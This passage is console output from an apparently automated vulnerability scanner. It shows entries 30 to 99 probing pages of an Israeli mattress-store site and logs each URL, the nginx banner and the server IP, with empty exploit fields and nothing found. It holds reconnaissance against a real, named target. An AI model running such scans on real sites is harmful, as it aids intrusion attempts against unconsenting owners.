- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-קטנים-בעזיר ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 30 / 100 ]-[04:32:22] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-זולים-בגאולים ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 31 / 100 ]-[04:32:24] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-יוקרתיים-בנופית ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 32 / 100 ]-[04:32:26] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-בחיפה ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 33 / 100 ]-[04:32:28] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-זוגי-באעצם ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 34 / 100 ]-[04:32:31] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-פשוטים-בכנרת ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 35 / 100 ]-[04:32:34] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-אלמות ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 36 / 100 ]-[04:32:36] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרון-בזול-כרמיה ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 37 / 100 ]-[04:32:39] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-בגןנר ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 38 / 100 ]-[04:32:41] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-ומיטות-במזרעה ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 39 / 100 ]-[04:32:43] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-מזרן-באחיטוב ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 40 / 100 ]-[04:32:46] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/חנות-מזרנים-שפיים ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 41 / 100 ]-[04:32:49] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/חנות-מזרנים-איתנים ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 42 / 100 ]-[04:32:51] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-ירדנה ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 43 / 100 ]-[04:32:54] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-בזול-רחובות ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 44 / 100 ]-[04:32:56] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-אדורה ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 45 / 100 ]-[04:32:59] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-מזרון-במסד ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 46 / 100 ]-[04:33:01] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-מזרונים-דבוריה ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 47 / 100 ]-[04:33:03] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-עודפים-בחוגלה ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 48 / 100 ]-[04:33:05] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-מומלצים-באלומות ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 49 / 100 ]-[04:33:08] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-דקים-בקטמון ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 50 / 100 ]-[04:33:10] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-קטנים-באוהד ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 51 / 100 ]-[04:33:12] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-עודפים-בערד ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 52 / 100 ]-[04:33:15] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-יפיע ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 53 / 100 ]-[04:33:17] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-פשוטים-בנצרת ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 54 / 100 ]-[04:33:19] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-זוגי-בשלומי ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 55 / 100 ]-[04:33:21] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-באביר-יעקב ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 56 / 100 ]-[04:33:24] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-נוחים-בהדסים ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 57 / 100 ]-[04:33:26] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-בבני-עיש ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 58 / 100 ]-[04:33:28] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/index.1.html ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 59 / 100 ]-[04:33:30] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-בהודיות ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 60 / 100 ]-[04:33:33] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרון-בזול-ריחן ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 61 / 100 ]-[04:33:35] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרנים-זולים-קדימה ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 62 / 100 ]-[04:33:37] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-זוגי-בבורגתא ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 63 / 100 ]-[04:33:40] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-ירושלים ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 64 / 100 ]-[04:33:42] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-ריחן ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 65 / 100 ]-[04:33:44] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-160-בביריה ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 66 / 100 ]-[04:33:46] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-ברטעה ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 67 / 100 ]-[04:33:49] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/חנות-מזרנים-במגאר ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 68 / 100 ]-[04:33:51] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-טבעיים-בפצאל ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 69 / 100 ]-[04:33:53] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-עודפים-בחורשים ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 70 / 100 ]-[04:33:55] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/חנות-מזרנים-מחניים ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 71 / 100 ]-[04:33:57] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-נוחים-ביכיני ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 72 / 100 ]-[04:34:00] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-קשים-באודם ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 73 / 100 ]-[04:34:02] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-סלמה ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 74 / 100 ]-[04:34:05] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-צורית ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 75 / 100 ]-[04:34:07] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-מזרון-מבקיעים ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 76 / 100 ]-[04:34:09] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/חנות-מזרנים-בחלמיש ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 77 / 100 ]-[04:34:11] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/חנות-מזרנים-ברטעה ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 78 / 100 ]-[04:34:14] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-כרכור ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 79 / 100 ]-[04:34:16] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-איתמר ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 80 / 100 ]-[04:34:18] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-מזרונים-ביזרעם ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 81 / 100 ]-[04:34:21] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-דקים-באדורה ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 82 / 100 ]-[04:34:23] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-אחיסמך ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 83 / 100 ]-[04:34:25] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-דקים-באמונים ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 84 / 100 ]-[04:34:27] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-עודפים-בלימן ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 85 / 100 ]-[04:34:29] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/חנות-מזרנים-באלעזר ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 86 / 100 ]-[04:34:31] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/חנות-מזרנים-באריאל ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 87 / 100 ]-[04:34:33] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-עודפים-במכמורת ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 88 / 100 ]-[04:34:36] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-נוחים-באדמית ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 89 / 100 ]-[04:34:38] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-מזרון-בנגה ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 90 / 100 ]-[04:34:40] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-קטנים-באעצם ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 91 / 100 ]-[04:34:42] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-טובים-במגן ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 92 / 100 ]-[04:34:44] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרנים-במבצע-אפיק ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 93 / 100 ]-[04:34:46] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-לילדים-באשקלון ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 94 / 100 ]-[04:34:49] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/חנות-מזרנים-פquotת ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 95 / 100 ]-[04:34:51] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-קצרין ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 96 / 100 ]-[04:34:53] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-יוקרתיים-בגלילות ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 97 / 100 ]-[04:34:55] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-חיפה ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 98 / 100 ]-[04:34:57] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-גבוהים-בחורפיש ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 99 / 100 ]-[04:35:00] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-ומיטות-בסכנין ]
- |_[ + ] Exploit::
